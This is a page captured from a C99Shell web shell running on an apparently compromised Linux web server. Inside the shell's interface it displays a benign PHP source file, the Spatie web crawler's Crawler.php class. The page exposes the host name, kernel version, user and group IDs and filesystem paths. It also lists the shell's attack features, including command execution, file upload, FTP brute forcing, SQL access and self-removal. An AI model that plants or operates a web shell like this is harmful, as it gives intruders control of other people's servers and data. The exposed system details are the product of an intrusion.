!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/classify.picotech.app/public_html/vendor/spatie/crawler/src/   drwxr-xr-x
Free 28.86 GB of 117.98 GB (24.47%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Crawler.php (13.22 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Spatie\Crawler;

use 
Generator;
use 
GuzzleHttp\Client;
use 
GuzzleHttp\Pool;
use 
GuzzleHttp\Psr7\Request;
use 
GuzzleHttp\Psr7\Uri;
use 
GuzzleHttp\RequestOptions;
use 
Psr\Http\Message\UriInterface;
use 
Spatie\Browsershot\Browsershot;
use 
Spatie\Crawler\CrawlObservers\CrawlObserver;
use 
Spatie\Crawler\CrawlObservers\CrawlObserverCollection;
use 
Spatie\Crawler\CrawlProfiles\CrawlAllUrls;
use 
Spatie\Crawler\CrawlProfiles\CrawlProfile;
use 
Spatie\Crawler\CrawlQueues\ArrayCrawlQueue;
use 
Spatie\Crawler\CrawlQueues\CrawlQueue;
use 
Spatie\Crawler\Exceptions\InvalidCrawlRequestHandler;
use 
Spatie\Crawler\Handlers\CrawlRequestFailed;
use 
Spatie\Crawler\Handlers\CrawlRequestFulfilled;
use 
Spatie\Robots\RobotsTxt;
use 
Tree\Node\Node;

/**
 * Concurrent web crawler built on a Guzzle client pool.
 *
 * A crawl starts from a base URL, pulls pending URLs from a CrawlQueue,
 * filters them through a CrawlProfile, and dispatches the resulting requests
 * through a Guzzle Pool. Responses and failures are handed to the configured
 * "fulfilled" / "rejected" handler classes, and registered crawl observers are
 * notified before each request and once when the crawl finishes.
 *
 * All setters return $this so that configuration calls can be chained.
 */
class Crawler
{
    /** User agent reported when the client configuration carries no User-Agent header. */
    public const DEFAULT_USER_AGENT = '*';

    /** URL the current crawl was started from (set by startCrawling()). */
    protected UriInterface $baseUrl;

    protected CrawlObserverCollection $crawlObservers;

    protected CrawlProfile $crawlProfile;

    protected CrawlQueue $crawlQueue;

    /** Number of URLs crawled in total; seeded from the queue's processed count in startCrawling(). */
    protected int $totalUrlCount = 0;

    /** Number of URLs crawled by this instance. */
    protected int $currentUrlCount = 0;

    /** Upper bound for $totalUrlCount, or null for no limit. */
    protected ?int $totalCrawlLimit = null;

    /** Upper bound for $currentUrlCount, or null for no limit. */
    protected ?int $currentCrawlLimit = null;

    /** Maximum response size in bytes (default: 2 MiB). */
    protected int $maximumResponseSize = 1024 * 1024 * 2;

    /** Maximum crawl depth, or null when depth is not tracked. */
    protected ?int $maximumDepth = null;

    protected bool $respectRobots = true;

    protected bool $rejectNofollowLinks = true;

    /** Root of the URL depth tree (created by startCrawling()). */
    protected Node $depthTree;

    protected bool $executeJavaScript = false;

    /** Lazily created by getBrowsershot() when not injected via setBrowsershot(). */
    protected ?Browsershot $browsershot = null;

    /** Null until startCrawling() has created it for the base URL. */
    protected ?RobotsTxt $robotsTxt = null;

    /** Class name instantiated (with this crawler) as the pool's "fulfilled" callback. */
    protected string $crawlRequestFulfilledClass;

    /** Class name instantiated (with this crawler) as the pool's "rejected" callback. */
    protected string $crawlRequestFailedClass;

    /** Delay between requests, stored in microseconds (see setDelayBetweenRequests()). */
    protected int $delayBetweenRequests = 0;

    protected array $allowedMimeTypes = [];

    /** Scheme applied by startCrawling() to base URLs that have none. */
    protected string $defaultScheme = 'http';

    /** Guzzle options used by create() when the caller supplies none. */
    protected static array $defaultClientOptions = [
        RequestOptions::COOKIES => true,
        RequestOptions::CONNECT_TIMEOUT => 10,
        RequestOptions::TIMEOUT => 10,
        RequestOptions::ALLOW_REDIRECTS => false,
        RequestOptions::HEADERS => [
            'User-Agent' => self::DEFAULT_USER_AGENT,
        ],
    ];

    /**
     * Build a crawler around a new Guzzle client.
     *
     * @param array $clientOptions Guzzle client options. An empty array selects
     *                             static::$defaultClientOptions; a non-empty array
     *                             replaces the defaults entirely (no merge).
     */
    public static function create(array $clientOptions = []): static
    {
        $clientOptions = (count($clientOptions))
            ? $clientOptions
            : static::$defaultClientOptions;

        $client = new Client($clientOptions);

        return new static($client);
    }

    /**
     * @param Client $client      HTTP client used for every request of the crawl.
     * @param int    $concurrency Value passed as the pool's 'concurrency' option.
     */
    public function __construct(
        protected Client $client,
        protected int $concurrency = 10,
    ) {
        $this->crawlProfile = new CrawlAllUrls();

        $this->crawlQueue = new ArrayCrawlQueue();

        $this->crawlObservers = new CrawlObserverCollection();

        $this->crawlRequestFulfilledClass = CrawlRequestFulfilled::class;

        $this->crawlRequestFailedClass = CrawlRequestFailed::class;
    }

    public function getDefaultScheme(): string
    {
        return $this->defaultScheme;
    }

    public function setDefaultScheme(string $defaultScheme): self
    {
        $this->defaultScheme = $defaultScheme;

        return $this;
    }

    public function setConcurrency(int $concurrency): self
    {
        $this->concurrency = $concurrency;

        return $this;
    }

    public function setMaximumResponseSize(int $maximumResponseSizeInBytes): self
    {
        $this->maximumResponseSize = $maximumResponseSizeInBytes;

        return $this;
    }

    public function getMaximumResponseSize(): ?int
    {
        return $this->maximumResponseSize;
    }

    public function setTotalCrawlLimit(int $totalCrawlLimit): self
    {
        $this->totalCrawlLimit = $totalCrawlLimit;

        return $this;
    }

    public function getTotalCrawlLimit(): ?int
    {
        return $this->totalCrawlLimit;
    }

    public function getTotalCrawlCount(): int
    {
        return $this->totalUrlCount;
    }

    public function setCurrentCrawlLimit(int $currentCrawlLimit): self
    {
        $this->currentCrawlLimit = $currentCrawlLimit;

        return $this;
    }

    public function getCurrentCrawlLimit(): ?int
    {
        return $this->currentCrawlLimit;
    }

    public function getCurrentCrawlCount(): int
    {
        return $this->currentUrlCount;
    }

    public function setMaximumDepth(int $maximumDepth): self
    {
        $this->maximumDepth = $maximumDepth;

        return $this;
    }

    public function getMaximumDepth(): ?int
    {
        return $this->maximumDepth;
    }

    /**
     * Set the pause between requests.
     *
     * The value is supplied in milliseconds and stored multiplied by 1000,
     * i.e. in microseconds.
     */
    public function setDelayBetweenRequests(int $delayInMilliseconds): self
    {
        $this->delayBetweenRequests = ($delayInMilliseconds * 1000);

        return $this;
    }

    /**
     * @return int The configured delay in microseconds (the stored value, not
     *             the millisecond value originally passed to the setter).
     */
    public function getDelayBetweenRequests(): int
    {
        return $this->delayBetweenRequests;
    }

    public function setParseableMimeTypes(array $types): self
    {
        $this->allowedMimeTypes = $types;

        return $this;
    }

    public function getParseableMimeTypes(): array
    {
        return $this->allowedMimeTypes;
    }

    public function ignoreRobots(): self
    {
        $this->respectRobots = false;

        return $this;
    }

    public function respectRobots(): self
    {
        $this->respectRobots = true;

        return $this;
    }

    public function mustRespectRobots(): bool
    {
        return $this->respectRobots;
    }

    public function acceptNofollowLinks(): self
    {
        $this->rejectNofollowLinks = false;

        return $this;
    }

    public function rejectNofollowLinks(): self
    {
        $this->rejectNofollowLinks = true;

        return $this;
    }

    public function mustRejectNofollowLinks(): bool
    {
        return $this->rejectNofollowLinks;
    }

    /**
     * Return the robots.txt wrapper created for the current crawl.
     *
     * The backing property is null until startCrawling() has run, so calling
     * this earlier violates the non-nullable return type and raises a TypeError.
     */
    public function getRobotsTxt(): RobotsTxt
    {
        return $this->robotsTxt;
    }

    public function setCrawlQueue(CrawlQueue $crawlQueue): self
    {
        $this->crawlQueue = $crawlQueue;

        return $this;
    }

    public function getCrawlQueue(): CrawlQueue
    {
        return $this->crawlQueue;
    }

    public function executeJavaScript(): self
    {
        $this->executeJavaScript = true;

        return $this;
    }

    public function doNotExecuteJavaScript(): self
    {
        $this->executeJavaScript = false;

        return $this;
    }

    public function mayExecuteJavascript(): bool
    {
        return $this->executeJavaScript;
    }

    /**
     * Replace all registered observers with the given observer(s).
     *
     * @param CrawlObserver|array $crawlObservers A single observer or a list of them.
     */
    public function setCrawlObserver(CrawlObserver|array $crawlObservers): self
    {
        if (! is_array($crawlObservers)) {
            $crawlObservers = [$crawlObservers];
        }

        return $this->setCrawlObservers($crawlObservers);
    }

    /**
     * Replace all registered observers with a new collection built from $crawlObservers.
     */
    public function setCrawlObservers(array $crawlObservers): self
    {
        $this->crawlObservers = new CrawlObserverCollection($crawlObservers);

        return $this;
    }

    /**
     * Append one observer to the existing collection.
     */
    public function addCrawlObserver(CrawlObserver $crawlObserver): self
    {
        $this->crawlObservers->addObserver($crawlObserver);

        return $this;
    }

    public function getCrawlObservers(): CrawlObserverCollection
    {
        return $this->crawlObservers;
    }

    public function setCrawlProfile(CrawlProfile $crawlProfile): self
    {
        $this->crawlProfile = $crawlProfile;

        return $this;
    }

    public function getCrawlProfile(): CrawlProfile
    {
        return $this->crawlProfile;
    }

    /**
     * Use a custom handler class for fulfilled requests.
     *
     * @param string $crawlRequestFulfilledClass Class name; must be a subclass of CrawlRequestFulfilled.
     *
     * @throws InvalidCrawlRequestHandler When the class is not a subclass of CrawlRequestFulfilled.
     */
    public function setCrawlFulfilledHandlerClass(string $crawlRequestFulfilledClass): self
    {
        $baseClass = CrawlRequestFulfilled::class;

        if (! is_subclass_of($crawlRequestFulfilledClass, $baseClass)) {
            throw InvalidCrawlRequestHandler::doesNotExtendBaseClass($crawlRequestFulfilledClass, $baseClass);
        }

        $this->crawlRequestFulfilledClass = $crawlRequestFulfilledClass;

        return $this;
    }

    /**
     * Use a custom handler class for failed requests.
     *
     * @param string $crawlRequestFailedClass Class name; must be a subclass of CrawlRequestFailed.
     *
     * @throws InvalidCrawlRequestHandler When the class is not a subclass of CrawlRequestFailed.
     */
    public function setCrawlFailedHandlerClass(string $crawlRequestFailedClass): self
    {
        $baseClass = CrawlRequestFailed::class;

        if (! is_subclass_of($crawlRequestFailedClass, $baseClass)) {
            throw InvalidCrawlRequestHandler::doesNotExtendBaseClass($crawlRequestFailedClass, $baseClass);
        }

        $this->crawlRequestFailedClass = $crawlRequestFailedClass;

        return $this;
    }

    /**
     * Inject the Browsershot instance returned by getBrowsershot().
     *
     * @return $this
     */
    public function setBrowsershot(Browsershot $browsershot)
    {
        $this->browsershot = $browsershot;

        return $this;
    }

    /**
     * Set the User-Agent header used for requests.
     *
     * The client is replaced by a new one built from the current client's
     * configuration. Existing header names are lower-cased in the process so
     * that 'user-agent' overwrites any differently-cased variant.
     */
    public function setUserAgent(string $userAgent): self
    {
        $clientOptions = $this->client->getConfig();

        $headers = array_change_key_case($clientOptions['headers']);
        $headers['user-agent'] = $userAgent;

        $clientOptions['headers'] = $headers;

        $this->client = new Client($clientOptions);

        return $this;
    }

    /**
     * Return the User-Agent configured on the client.
     *
     * Header names are compared case-insensitively; DEFAULT_USER_AGENT is
     * returned when no such header is present.
     */
    public function getUserAgent(): string
    {
        $headers = $this->client->getConfig('headers');

        foreach (array_keys($headers) as $name) {
            if (strtolower($name) === 'user-agent') {
                return (string) $headers[$name];
            }
        }

        return static::DEFAULT_USER_AGENT;
    }

    /**
     * Return the Browsershot instance, creating a default one on first use.
     */
    public function getBrowsershot(): Browsershot
    {
        if (! $this->browsershot) {
            $this->browsershot = new Browsershot();
        }

        return $this->browsershot;
    }

    public function getBaseUrl(): UriInterface
    {
        return $this->baseUrl;
    }

    /**
     * Crawl starting at $baseUrl and return once the queue is exhausted or a
     * crawl limit is reached.
     *
     * A string is converted to a Uri; a missing scheme is replaced by the
     * default scheme and an empty path by '/'. After the queue has been
     * processed every observer's finishedCrawling() is called.
     *
     * @param UriInterface|string $baseUrl
     */
    public function startCrawling(UriInterface|string $baseUrl)
    {
        if (! $baseUrl instanceof UriInterface) {
            $baseUrl = new Uri($baseUrl);
        }

        if ($baseUrl->getScheme() === '') {
            $baseUrl = $baseUrl->withScheme($this->defaultScheme);
        }

        if ($baseUrl->getPath() === '') {
            $baseUrl = $baseUrl->withPath('/');
        }

        // Continue counting from whatever the (possibly pre-filled) queue has already processed.
        $this->totalUrlCount = $this->crawlQueue->getProcessedUrlCount();

        $this->baseUrl = $baseUrl;

        $crawlUrl = CrawlUrl::create($this->baseUrl);

        $this->robotsTxt = $this->createRobotsTxt($crawlUrl->url);

        // The base URL is queued when robots.txt allows it, or when robots rules are ignored.
        if (
            $this->robotsTxt->allows((string) $crawlUrl->url, $this->getUserAgent()) ||
            ! $this->respectRobots
        ) {
            $this->addToCrawlQueue($crawlUrl);
        }

        $this->depthTree = new Node((string) $this->baseUrl);

        $this->startCrawlingQueue();

        foreach ($this->crawlObservers as $crawlObserver) {
            $crawlObserver->finishedCrawling();
        }
    }

    /**
     * Register $url in the depth tree as a child of $parentUrl.
     *
     * When no maximum depth is configured the tree is not maintained and a new
     * detached node is returned. Otherwise the tree is searched depth-first,
     * starting at $node (or at the tree root when $node is null), for the node
     * whose value equals the parent URL; the new node is attached to the first
     * match.
     *
     * @param UriInterface $url       URL to add.
     * @param UriInterface $parentUrl URL on which $url was found.
     * @param Node|null    $node      Subtree to search; null means the whole tree.
     *
     * @return Node|null The newly created node, or null when the parent URL is
     *                   not present in the searched subtree.
     */
    public function addToDepthTree(UriInterface $url, UriInterface $parentUrl, ?Node $node = null): ?Node
    {
        if (is_null($this->maximumDepth)) {
            return new Node((string) $url);
        }

        $node = $node ?? $this->depthTree;

        $returnNode = null;

        if ($node->getValue() === (string) $parentUrl) {
            $newNode = new Node((string) $url);

            $node->addChild($newNode);

            return $newNode;
        }

        foreach ($node->getChildren() as $currentNode) {
            $returnNode = $this->addToDepthTree($url, $parentUrl, $currentNode);

            // Stop at the first subtree that contained the parent.
            if (! is_null($returnNode)) {
                break;
            }
        }

        return $returnNode;
    }

    /**
     * Drain the crawl queue.
     *
     * A new pool is created and awaited for as long as no crawl limit is
     * reached and the queue reports pending URLs; each pool consumes the
     * request generator from getCrawlRequests().
     */
    protected function startCrawlingQueue(): void
    {
        while (
            $this->reachedCrawlLimits() === false &&
            $this->crawlQueue->hasPendingUrls()
        ) {
            $pool = new Pool($this->client, $this->getCrawlRequests(), [
                'concurrency' => $this->concurrency,
                'options' => $this->client->getConfig(),
                'fulfilled' => new $this->crawlRequestFulfilledClass($this),
                'rejected' => new $this->crawlRequestFailedClass($this),
            ]);

            $promise = $pool->promise();

            $promise->wait();
        }
    }

    /**
     * Create the robots.txt wrapper for the host of $uri (path replaced by '/robots.txt').
     */
    protected function createRobotsTxt(UriInterface $uri): RobotsTxt
    {
        return RobotsTxt::create($uri->withPath('/robots.txt'));
    }

    /**
     * Yield one GET request per pending URL, keyed by the CrawlUrl id.
     *
     * URLs rejected by the crawl profile or already processed are marked as
     * processed and skipped without notifying observers or counting towards
     * the limits. Iteration stops when a crawl limit is reached or the queue
     * returns no further pending URL.
     */
    protected function getCrawlRequests(): Generator
    {
        while (
            $this->reachedCrawlLimits() === false &&
            $crawlUrl = $this->crawlQueue->getPendingUrl()
        ) {
            if (
                $this->crawlProfile->shouldCrawl($crawlUrl->url) === false ||
                $this->crawlQueue->hasAlreadyBeenProcessed($crawlUrl)
            ) {
                $this->crawlQueue->markAsProcessed($crawlUrl);

                continue;
            }

            foreach ($this->crawlObservers as $crawlObserver) {
                $crawlObserver->willCrawl($crawlUrl->url);
            }

            $this->totalUrlCount++;
            $this->currentUrlCount++;
            $this->crawlQueue->markAsProcessed($crawlUrl);

            yield $crawlUrl->getId() => new Request('GET', $crawlUrl->url);
        }
    }

    /**
     * Queue $crawlUrl unless the crawl profile rejects it or the queue already contains it.
     */
    public function addToCrawlQueue(CrawlUrl $crawlUrl): self
    {
        if (! $this->getCrawlProfile()->shouldCrawl($crawlUrl->url)) {
            return $this;
        }

        if ($this->getCrawlQueue()->has($crawlUrl->url)) {
            return $this;
        }

        $this->crawlQueue->add($crawlUrl);

        return $this;
    }

    /**
     * Tell whether the total or the current crawl limit has been reached.
     *
     * A limit of null means "unlimited" and never triggers.
     */
    public function reachedCrawlLimits(): bool
    {
        $totalCrawlLimit = $this->getTotalCrawlLimit();
        if (! is_null($totalCrawlLimit) && $this->getTotalCrawlCount() >= $totalCrawlLimit) {
            return true;
        }

        $currentCrawlLimit = $this->getCurrentCrawlLimit();
        if (! is_null($currentCrawlLimit) && $this->getCurrentCrawlCount() >= $currentCrawlLimit) {
            return true;
        }

        return false;
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0046 ]--